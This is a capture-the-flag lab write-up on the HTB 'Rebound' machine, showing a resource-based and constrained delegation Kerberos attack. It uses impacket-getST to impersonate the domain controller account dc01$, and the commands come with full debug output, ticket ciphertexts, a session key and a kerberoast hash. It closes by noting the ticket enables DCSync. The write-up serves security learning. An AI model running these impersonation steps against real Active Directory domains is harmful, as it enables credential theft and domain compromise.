Kerberos Constrained Delegation Attack

I have previously performed the RBCD attack to append the SID of the ldap_monitor account to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the delegator$ account with the browser/dc01.rebound.htb SPN

Now, the ldap_monitor account is able to impersonate others users on delegator$ via S4U2Proxy

full s4u2 (self + proxy)

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ KRB5CCNAME=ldap_monitor@dc01.rebound.htb.ccache impacket-getST rebound.htb/ldap_monitor@dc01.rebound.htb -k -no-pass -spn 'browser/dc01.rebound.htb' -impersonate 'dc01$' -dc-ip $IP -debug           
Impacket v0.11.0 - Copyright 2023 Fortra
 
[+] Impacket Library Installation Path: /home/kali/.local/lib/python3.11/site-packages/impacket
[+] Using Kerberos Cache: ldap_monitor@dc01.rebound.htb.ccache
[+] Returning cached credential for KRBTGT/REBOUND.HTB@REBOUND.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: ldap_monitor
[*] Impersonating dc01$
[+] AUTHENTICATOR
Authenticator:
 authenticator-vno=5
 crealm=REBOUND.HTB
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   ldap_monitor
 
 cusec=646001
 ctime=20230914142543Z
 
 
 
[+] S4UByteArray
 0000   01 00 00 00 64 63 30 31  24 72 65 62 6F 75 6E 64   ....dc01$rebound
 0010   2E 68 74 62 4B 65 72 62  65 72 6F 73               .htbKerberos
[+] CheckSum
 0000   FA 8F 16 B3 41 11 9E 15  53 F7 2F 21 F2 2D 90 44   ....A...S./!.-.D
[+] PA_FOR_USER_ENC
PA_FOR_USER_ENC:
 userName=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   dc01$
 
 userRealm=rebound.htb
 cksum=Checksum:
  cksumtype=-138
  checksum=0xfa8f16b341119e1553f72f21f22d9044
 
 auth-package=Kerberos
 
[+] Final TGS
TGS_REQ:
 pvno=5
 msg-type=12
 padata=SequenceOf:
  PA_DATA:
   padata-type=1
   padata-value=0x6e82053530820531a003020105a10302010ea20703050000000000a38204a4618204a03082049ca003020105a10d1b0b5245424f554e442e485442a220301ea003020101a11730151b066b72627467741b0b5245424f554e442e485442a38204623082045ea003020112a103020102a28204500482044cdfe6ab8c6164b1f734b04fa52fbbd8d525605d54cd8452a506138161b00f80dfe9d35405208217a4a93249f59343e00d2223004618adafb85ee413b8a4265fba1fde70907b9e378996450527164279e2a465a50add5380bcaf39542e9003e9ce8ce4e9ad4920e5da88aa7ab893fb2ecebf40d2ef130783966ad2375a1b36ed15a336a26e8d8bff7be32a575a78e4717304bbed6b669554a68b1e8abc843d34118eb9b91c680e3ccb60adaf2c29944b69c92e0b5f82f2176a8139f8fab21bccc3a08deb23fad5f65cc0c05ee9a7e9da725673d8aae26d00ca8954e8d0b5a4a5338b7140b1dccf497e3620611e06cef52b4b407be5dde9a885c7092706d44e69a40d2d92e5fa0fe7c6138513fc85bf93da19543c63efe4e33ee08a44b7c3ada7b9b37476e67db04d682d359444c54061563a8deaf37056b87de6ff1aef7dd92b17fbe65d8fa4788e656eb7c2eed50cf73dbaaf6d0e5f6096f5dc4eddc539ce19747f5044931246c75db2f59b3a742264385ba702ffef09914c42c581ca3ae0024eedabc0c3e6e13b9f67bc15f6989a5e305e7cb09b2c5eba86ab7828457b07b089e0d62bd5c3bbf6a789aa7aa2c25c8c94b9a41dcc117aab9b3110353b7ea7180aaa22c9a2ede026dbe4bd30132d344e2e8422bd1151f5da7063c76c325a6c306731bffa2a52b239a6bff97a02fc782205e3890862ee6a898cdec52593dee5d90a0a25b48f4a83623afb41e8b757ec10e46dd2be0be336dc1710434864e7b131b632ee048eec2fc363f55a8c9d90bafb1e58738e702d913117d83d755c5d8577c665b38fb167a726a2cf333c88339ba776b2c688b6462d58b70d347281ae5a76aaba2c9ad574990e0030dd6cc7c95b8c9a19860e6a1f965bbd2beed544ca4fc9018aac6718416f61f832ecf427c9464b1e6bbddec32f5526dc190f2e8a4aeac3056279c90eb84ddb86cb564a4ba59087267e8ee40aa4de8cdd8011c6786b499fd6e135aa87b0e232264e456e5badcc4a77c5fa0cdeecafbf92ca8b79954c83936c0dd1166d23c59976c119ded6e5b0c307a33f7e583de51e2e4bd73755e1df7574dc41f301f37282d47b2e9ff715e2761443d916d12ff41cd8e043a50406602bf5c764431207d74f73b4c2dc9cd7633769394e67bd8e5970780c9e69980ca20ceec464bbb4fa00146b5aa24d6d41a551504a73e97eaa077899c0ba4f147af5e26b12eca2f40b67616f9e23f08fd9da5a8ae4c5e939829d3016c358fda4057e46ff8a2985d83e795563b4f86dd409f7e267795b7b52fd3b0716870a4559da919630b294abacd9dd1c7219c7ca23374a5969589fdd95068c047f623fcfcdaf3b5d17c93fc3501763786c202334cd40e3b2d0c689fa9a70a1328dc9644775d912b8e1e3551b40bec1ef8248725ed5bc496c08f4be652c445d739799254dc4b07fde8dcf70ade32004cd3fe19ca066583f4b0ab5b079adc48a2ecc58a6af1655e26f6359d7c60488acc5b96c38237f895a363c576ce8330fd100022ef711df0734ac89b8b475331e655e3de6c2aa63a4743072a003020112a26b0469cd19627ec842fc5826ea8e9d12ee14c9a41d199ffebad1bbc0332202b212e19569755b533e8634ed467990a2f7010dad7b03718fc2848a6e88bf51dbbb590f5aaa7c95354b0138c117f6998e9ead138bb9439637b84f480ffa31ade07c34289595145b726028021baa
  PA_DATA:
   padata-type=129
   padata-value=0x304da0123010a003020101a10930071b056463303124a10d1b0b7265626f756e642e687462a21c301aa0040202ff76a1120410fa8f16b341119e1553f72f21f22d9044a30a1b084b65726265726f73
 
 req-body=KDC_REQ_BODY:
  kdc-options=1082195968
  realm=REBOUND.HTB
  sname=PrincipalName:
   name-type=0
   name-string=SequenceOf:
    ldap_monitor
 
  till=20230915142543Z
  nonce=1599889139
  etype=SequenceOf:
   18   23
 
 
[*] 	Requesting S4U2self
[+] Trying to connect to KDC at 10.10.11.231:88
[+] TGS_REP
TGS_REP:
 pvno=5
 msg-type=13
 crealm=rebound.htb
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   dc01$
 
 ticket=Ticket:
  tkt-vno=5
  realm=REBOUND.HTB
  sname=PrincipalName:
   name-type=0
   name-string=SequenceOf:
    ldap_monitor
 
  enc-part=EncryptedData:
   etype=23
   kvno=2
   cipher=0x39522b6296d772c4a02021c8e0c2e252b308c82a8a6cf658f5a1946384117b2591069ec0acaadc55bd22870beb563819761acc7b580c2c92b7c84cb6e421b359929b84a63c691b050d89be61db1408fc1a12ceea90a26d4a0616b97effca74af7bf3cddec50f22fcd5915f6a6831aa75a429f49f9811e4c92f7f00ad9c1784e655f40054c8c527794004c8e5b517555b94715f8dc426f014f66d0d5c0c8e66141f13f15102a328dba9babcfade027f1b00d098e998df27bf44764ebf0f1a095651586fc4bc5820ef8e310f95d56026cd351d798c65f4c8281506569454ff2dc0574cf81cc8f4031880df8923f7ab2514f25f7bf94bf549566f2b8340e2835b2d16598ab2b9eb77933d366ac6295e5d78ba273ad6c6d841fd030fdf3c54c834c39dbeee89c0222ea1ba4c132957d6bd5b949abd2679269da64fbaf1c7ce27be2c2882288f12fafc9ad4a684c17bd5f1cb8baa46db1262975c466da9a8d3c40c28cdaf91cdc26516a8f4b5abeb39d993e972eaad1542c3fc424071c9a9eb33a5c7e99317abe1d18fca7a40b72ca49f7d587d9f8c61f0e3c0599aeae90ffc8abb813a4f43c058e0f8d83947a3f421bd574bd6f011f052081813bfc83178899f741fa052e6864e62ed56cdc6d82e85ee114b97d412f19934fce9f2e0e5648dbd02cbfa2c3dc92fc3826e6a272b94088261d98f45b11c0cad753d369df76cf8b1c874d63ab1654373326dbdf0554ef2c0cd62450f9834e7d4aa3247abbf18637c3fb6c724d42b2f94910e898d7de5e95f0b85069d66809c4388ce769198c9ab43d6436d45596104016a37aec7d42278469c04f90694f412f9fa8cfd7cfe44428f0375d863882c8b13ff82f7f86d8002a349a74d7d4549eddff594801aa95d7810aaf76988ea0cddac489ecd79ce4c3b3f4b03a637494807e1783d3930699b49887e68d2a65fa649246e852ac0fdf0881e0357fa3e425a4b3e1c8b74295a52bd7700e55cd02dd151be10d12f5653739fba83531394abf1883fe95df5433024f0d3b1562ee89839616e0a73d849b6045a79cf3ed7d95fab4ad160e79653f2ffcfb67ffe4ea18770141ce63a831bea2de78d68ae594e524e015a81e5f6e9a68aa5cb85975c26850acf295d72732b76e72d2930177641447d2c12d4a4110604b55a3e140b89ffcc8d628983464bfbd7811a1acdcd970d583bde914f00175745eac94cd6aaf8f8afde339777102d5b27560c4a1d1e47dc033074fe86cfd789dc3d755d162b85246e4a1f1612afd39a38f16edd59cbda7fd0c938a9ce5ae7712217934d743dd067622380605effc2c097d3370832949a634e279dd7b4a8a142eab4bdb145531826c95e92b79c56fee971f155b5a582389848db160a207fa5e46ab827550c3520c6b7688791b2035c2cf590dfed4daa66e44adb0f5540b02090c4d4518d88fb373ec118dac4ef02a0ca3e112d18234568c5525af831a635a158f40d5e84b16a2c9502a2e1a1e76a84bcc9ffe53820ff5915d98a5a2d530b7916401ef73b7a6f7a6d8633698ec2aceb59b236a54600bf2d42ecef97c2706ab1ad2b57292ea01bcf3475f4140d5bcedf
 
 
 enc-part=EncryptedData:
  etype=18
  cipher=0x20c1e4a777f59d4d171b28c6128607beb5f90923375a12cac0c99dcde0da42916d671e0c25e93339911d05aa996d709a459d010a2ee71f35c9d4f3b16264ec1d11f06078510271659a9ca3c3762a24cf9c0e3ec91b788848dde02d6822a6e5d108bfe44b22c6feb80b3c442683861d58b6234e40016249e5c2bd4d626c503e4f3947bf9b70b0d5d774fe45cd26d40b958fda227194becffeb7819d89c4e9251396688dd80cff096c81c0625b9654a858f5e5c847aba2553c79be84bff8266a35f43803665711d1c637275d7f72cfc969ba65f7fb988213a3941570c65d646c0c38cd88f7c8fb7dfe2bb0299b2a0275ce9c835316655b9ee0e9f4e6f37138c9dde7bf235dabfd9e3e
 
 
[*] 	Requesting S4U2Proxy
[+] Trying to connect to KDC at 10.10.11.231:88
[*] Saving ticket in dc01$.ccache

Impersonating the dc01$ account from the ldap_monitor account, leveraging the acquired delegation set to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute in the browser/dc01.rebound.htb SPN of the delegator$ account

Now, this would generate a forwardable service ticket that is sufficient in most cases, but an additional step is required to finally access the http/dc01.rebound.htb SPN

Ease of Identification

For ease of identification, I will rename the dc01\$.ccache file to dc01\$.ldap_monitor.ccache

additional s4u2proxy

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ KRB5CCNAME=delegator\$@dc01.rebound.htb.ccache impacket-getST 'rebound.htb/delegator$@rebound.htb' -k -no-pass -spn "http/dc01.rebound.htb" -impersonate "dc01$" -additional-ticket dc01\$.ldap_monitor.ccache -dc-ip $IP -debug
Impacket v0.11.0 - Copyright 2023 Fortra
 
[+] Impacket Library Installation Path: /home/kali/.local/lib/python3.11/site-packages/impacket
[+] Using Kerberos Cache: delegator$@dc01.rebound.htb.ccache
[+] Returning cached credential for KRBTGT/REBOUND.HTB@REBOUND.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: delegator$
[*] Impersonating dc01$
[*] 	Using additional ticket dc01$.ldap_monitor.ccache instead of S4U2Self
[+] Returning cached credential for BROWSER/DC01.REBOUND.HTB@REBOUND.HTB
[+] Changing sname from browser/dc01.rebound.htb@REBOUND.HTB to b'browser/dc01.rebound.htb@REBOUND.HTB' and hoping for the best
[+] TGS_REP
TGS_REP:
 pvno=5
 msg-type=13
 crealm=REBOUND.HTB
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   dc01$
 
 ticket=Ticket:
  tkt-vno=5
  realm=REBOUND.HTB
  sname=PrincipalName:
   name-type=2
   name-string=SequenceOf:
    browser    dc01.rebound.htb
 
  enc-part=EncryptedData:
   etype=18
   kvno=1
   cipher=0xe13f948efb5a67e4b55029b58668e0f88905c32973fced8a131dbc6925f77f5238e2d81c2465b0abba07ffba8b8f4d243cd75ce06cdd11b554e684f5655886f4cefaacea25a7f1ef959d6afe4c2acee75d45b85583c8c6f28fccd55f3537a3bd63b0f13b485c591587b592d3b0dab9bc45741c936e7d4ebac959a4255761743609c5d30159eb51e73fe5474fe0b5e7153d66332571d35ec5147c4b9f6821d19872a4a32d0cac095b220d458c4404ec65852ede26bdd5e7217fdaed7772d6aff73a00a91d8d02bca62d75b3084cce8cfe3e08f85ee2890498c4dab24c0b874926a43044097dedc129e7588cd682a9febcb9d237bc5fed6e3017bf93f02db7c414bead2ebd101401189120b4bdc43177ac51f51955d9bff6c44e23da3f1a2239ed58d1df012972a3b8cd20954dfbfb3596729aeca55626be7c4f54f250758cecf7695169a225eda5f85c31cfe92f83aafd9a9e15e2cf59f5256b43f39bc29dcba16a6ac87d17ffdbdada000743a8bc26deee4f75baada0e9ee69194836ac12a085bfd320f5a738976c8df3e151eadaf3c0ff97b92c9e89116908f313a791f94961514a3ae7b6e56d167e55d8290315a9c9d80cc02e024536e54e1ff90e4429080646d00fd9f0f518bd22e3a9a28c7a9f09eb3dfc79efd552983359def957780b29cc7668ffe258fbaaa7fa55298c95e54ed372ad6b650afc292fdbcd84017fe05105e5fff04c278bca73a4454c7dd6f790a15d6d78faf6b1acebdf054c50f78d6df4552d96a8fa15bc8283a305647ea9ea9fc67b2d3fd94aeb62138c035a89ec5155344e94fa18f82422eb0e8af8e1a579966ed7efdf215256742cac549dff8c7f99bdb663ded4dee702afaa16a140abec628dcba6f68d6cbd1cc312c3a1f03984612a29bb2c1e08574094df0ed7bf60ca92b9312c08f38d5ddbe17f66458b7a4b8c9ecc3eea2b6567e0d6f919b3fb4759ba924cbad5f93d70146f00b6db7f4865ffe14395c18225dc60ae1653eae3bd926e1ca38e4ff1caa6af34969679cfba9242566ed6d73ec5e9a05c0359fa257303dd51f646f3a00ee3b57cfbc4e2b97bfd5ce8e9bfc4a75778fe839e04dabdee4f06863b036ec9d27d8e7140f7e95b181ef1efcd612aff3aa46227dcd4e7a8c72bbec09073b40ebfd27d844d922e1378353b59c87ee796fe1971a1a333506b4e96c136f969fce6bc9cc638c65f4c3d5d2ac29adf929d85daeebdbaf3ef8f07d7bdb16ef32bd35e6f2d8890411dca4c55af34f26a4f85e174d374edec5c072931b66ffe28a2c6d8626a5fb8bad0d4695d6a0e15645d435ebfc2522ecc6e361f2543f0abbc26115f62d1e388299750f4cdf609efc0b572e287ceaea21e77bb356a24c229d95dd0d335c374ee258b9845fbb33c635e4481e8e8703932c304f63fa350c6005f8652b2bf9407f3e54509479ed53ab07ac1fb8ad0caf686fb7490fbe9400d752fd765c969d4c5aae3756c0c4473a195ecaf3648f34ca2c2402ff54c3b5913229af3432ecca704df70c9259ff73848620db3dc66e6cb4b525976913ce8943cb3de67eff786fd3a65a87ccdd5cdc4e2c69e20973972bb4c160e4fe26ceeadde3b94daabbd98147e88642300b0c3f64f5d3da438ec6a284590d3e1f8c9d069674ebe2a250b6842f7081b0fc74fff111130cd6f65622e00e0d5ee21680a3fedad2d7085ae8c822debcf9ce05a0503ba5a02661d22b2e223c7ce58a20515202eeffc257aa53aecafa94d3196cc3705bdce3ef0011fc823d86bb097f9fc7df932fa9d13780f7b75eafbb21e490a652ce0da4ed841c93443c3230aed49f9
 
 
 enc-part=EncryptedData:
  etype=1
  cipher=
 
 
[*] 	Requesting S4U2Proxy
[+] Trying to connect to KDC at 10.10.11.231:88
[*] Saving ticket in dc01$.ccache

The delegator$ account requests a TGS ticket for the http/dc01.rebound.htb SPN while impersonating the dc01$ account. Additionally, the -additional-ticket flag was supplied to leverage the forwardable service ticket in a S4U2Proxy request for RBCD + KCD [[Rebound_Delegation#[without Protocol Transition](https //www.thehacker.recipes/ad/movement/kerberos/delegations/constrained without-protocol-transition)|without Protocol Transition]]

dc01$.ccache

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ python3 describeTicket.py ./dc01$.ccache                                                        
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] number of credentials in cache: 1
[*] parsing credential[0]:
[*] user name                     : dc01$
[*] user realm                    : rebound.htb
[*] service name                  : http/dc01.rebound.htb
[*] service realm                 : REBOUND.HTB
[*] start time                    : 14/09/2023 16:26:32 PM
[*] end time                      : 15/09/2023 00:11:38 AM
[*] renewtill                     : 15/09/2023 14:08:43 PM
[*] flags                         : (0x40a50000) forwardable, renewable, pre_authent, ok_as_delegate, enc_pa_rep
[*] keytype                       : rc4_hmac
[*] base64(key)                   : o7+g+mWXZhZMhBQN80c18A==
[*] kerberoast hash               : $krb5tgs$18$USER$REBOUND.HTB$*http/dc01.rebound.htb*$0573631a33f6f955f0487c23$cb683460bdffd68b85317cb5c8c004aeda5b2def037a4866652c9a10fc276f9e98c8e56aea338612788989ed7d30213728adc0e6deb94dbee37f21ecb18498afb480e83a24f826a022674fcb9a8ac3d505a8630ef3203ee78278e3b1d44f159144ea935a82d71bb7078d793490afb18b9bf2a8f5fb7d79286e87dd4deee8d27566f8653edef9b3d3a8013b7714d8579264d98244c685e24d255321bb262cc55e0b18b11ef9edea870c3e244388c76d65e2646539146f2fab1a17e70d39005c9e18c0d733772c3c5abc2d9e7ed4744e98f855138b808f5fd52b406dc1c2f297f1fa60281ad9b5b2a7cd502e97ceedc9678f63ddfb0b6b3d994aaafea6ec2b70fb237c78e3c342d8c0f9791fdb1e49ec475e143a95e8ccf75501167c2dd324bd43feb64e114e789ceba1b9f4340b6bb128449969d79212dbfa83f77b2a4585004543a6b51eeae2742e145a944be18440af6e72bc36c606dcc559d052719c8a880304fb169a99a8722f46a87e35f8ac23239b8a14dc1458e65fb3be07c243528b06a6b7707b86fb89a39291a669dce16c35d97066fccd467af6391b8856d938af6e6fe934386a59cf5e0cd626eb6bf4ca8d57ae3b7f1a1fc86dadfd6b4f0aaddd4d93faf0f1c0919bd8ee04b5de7962aa6437f38e7fdbb19e2ec47f44841a99b2c8cbfa03dd8aedaf29391b5a6d2541bc2445a8618e3c1c208c352fc03ef7cfd5998f24db23e791d24c371ed4dc9bec7e775935db36ab3916c1523840cf4a00bbfa0a415399be0d6850536ed0dd04d885b655dd1ffe987f0c25ff5a9df94862c67d1a4531e47e24c77c2c2ed867c6ad14ef8d2587d658a2020a3e842e5a5efc45fbae6318fcf5c2ce3865e4c79e3255f8246bdac6613160abe233f0b0962f9270d3affcb230652863f1f80dcbfcd9306f2d756c7b9fd1473ebad5271377a7268d21054e83a9a04cb40ca181523c48d67f6b9dec1ff1238a6023883c0fd26f82c301b9c66ba84b0b870ceb20cdae9dd29e0331e8e5a48063f7707e70e8cbf87b920106427ad66fec6ebf09a39142ebf57aa2df0b5ecd9c31e663e98f6d1aed59e7bd19335b20614c8ebc74a5d8c6366c149c000590bffa3c85696e0c6b3370fc4ed4c5ab19396e7de6ef55435343a420c5b36586f4e243e884490c88b7358b17e529aeab52cddee60e79715fcb2aabde0bbc767334ad5e4651583a55ca77180f7a04f66277a6649ce6bf247226f50f795e2720372ba59f0c2cad0bfb45e8503bd6c306327aae1b9fe35a55ff2c6c82ee9f7e7b5c91a38375cd19c00ff3ed9606817e428de0285fef4540730333657f31a820d657b6781e8dbc1d7194ebca8b25cc6650b522ea44a88e146e03a1b1c589dc2a66e082e211a971d532616e45c33394040dbb94196bd11df607e2b7c83b6359fbf69e2e647d30d4682f65ec0d5b81106f9d719a65f1632ab6d4586205f435988f105c155f037db97720e37d432709970a25b674a2ff358ae7d5cd2a53dd4f6b25921a5c538171a59e4c1b79dc0d1ff56b36660acc12f3af8ed8f4e0a07a7233dab413b50b7cd5a029bd9906192cd6adcd07d0788c64dec7381fa22d0a497fde95b319c0599303f944f84036a314c42ed1152fa32047974ea454fd2fb2e632d51fdb597fd47313d72daf13d1e3bc376adb6427c69ad62e775518bc96305d0b89f4bc83b17d95073eef988c418a054fe1a718fd47cca5dfca2daf9162accb06bf564a7a11832f92b9aa43261779847037692d91a40a38009f1b0f4fb74c2f62d0629d1c158c28f9686b32a79c4187e3fc6c7b83d108cf1dc4b33702b030bfdcb912bd82b408d89652493e208d7e497a5356fcc99d6421fa83290d27e604bd0c42706ee6da523e16b8cc4dbb7ef0f34112f8b72b527c350acd644cae04558b117f899e137d8f86106aecbd
[*] decoding unencrypted data in credential[0]['ticket']:
[*]   service name                : http/dc01.rebound.htb
[*]   service realm               : REBOUND.HTB
[*]   encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[*]   key version number (kvno)   : 4
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied

The result is the valid TGT, dc01$.ccache, of the dc01$ account with the ok_as_delegate flag set, which can be abused to perform DCSync to the target domain

InfoSec LAB

Explorer

Rebound_KCD_Attack

Kerberos Constrained Delegation Attack

full s4u2 (self + proxy)

Ease of Identification

additional s4u2proxy

dc01$.ccache

Interactive Graph View

Table of Contents

Backlinks